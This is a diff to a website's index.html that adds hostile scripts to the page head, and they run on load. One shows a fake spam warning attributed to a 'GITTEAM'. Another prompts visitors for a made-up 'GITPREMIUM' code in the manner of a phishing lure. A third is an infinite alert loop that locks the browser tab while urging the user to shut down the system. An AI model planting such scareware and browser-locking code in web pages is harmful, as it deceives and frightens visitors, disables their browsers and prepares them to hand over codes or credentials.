--- a/index.html
+++ b/index.html
@@ -2,6 +2,18 @@
 <html lang="en">
 
 <head>
+  <script>alert("Spam Website marked by our GITTEAM")</script>
+    <script>
+    var aa= prompt("Enter validIDproff unique key with 4digit GITPREMIUM CODE");
+    alert("some details is not matching");
+    </script>
+    <script>
+      
+      var a =99;
+       while(typeof a!==String){
+         alert("This Site Is Experiencing Unexpected Traffic We request you to close the Current tab/or shut down the System ");
+       }
+       </script>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <meta http-equiv="X-UA-Compatible" content="ie=edge">
